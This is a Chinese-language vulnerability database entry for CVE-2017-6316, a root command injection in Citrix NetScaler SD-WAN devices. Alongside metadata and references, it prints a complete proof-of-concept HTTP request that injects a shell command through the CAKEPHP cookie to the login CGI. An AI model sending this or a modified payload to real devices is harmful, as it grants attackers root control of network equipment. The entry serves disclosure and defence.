Citrix NetScaler SD-WAN设备安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1124109 漏洞类型 输入验证
发布时间 2017-07-19 更新时间 2017-07-25
CVE编号 CVE-2017-6316 CNNVD-ID CNNVD-201702-880
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/42346
https://www.securityfocus.com/bid/99943
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201702-880
|漏洞详情
CitrixNetScalerSD-WANdevices是美国思杰系统(CitrixSystems)公司的一款具有网络可视性的中央控制器设备。CitrixNetScalerSD-WAN设备9.1.2.26.561201及之前的版本中存在安全漏洞。远程攻击者可借助CGISESSID(CAKEPHP)cookie利用该漏洞以root权限执行任意shell命令。
|漏洞EXP
POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1
Host: 10.242.129.149
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/
Cookie: CAKEPHP=`sleep 10`
Content-Type: application/x-www-form-urlencoded
Content-Length: 13

action=logout
|受影响的产品
Citrix NetScaler SD-WAN Enterprise and Standard Edition 9.0 Citrix CloudBridge Virtual WAN Edition 8.0
|参考资料

来源:EXPLOIT-DB
链接:https://www.exploit-db.com/exploits/42345/
来源:EXPLOIT-DB
链接:https://www.exploit-db.com/exploits/42346/
来源:NSFOCUS
名称:37231
链接:http://www.nsfocus.net/vulndb/37231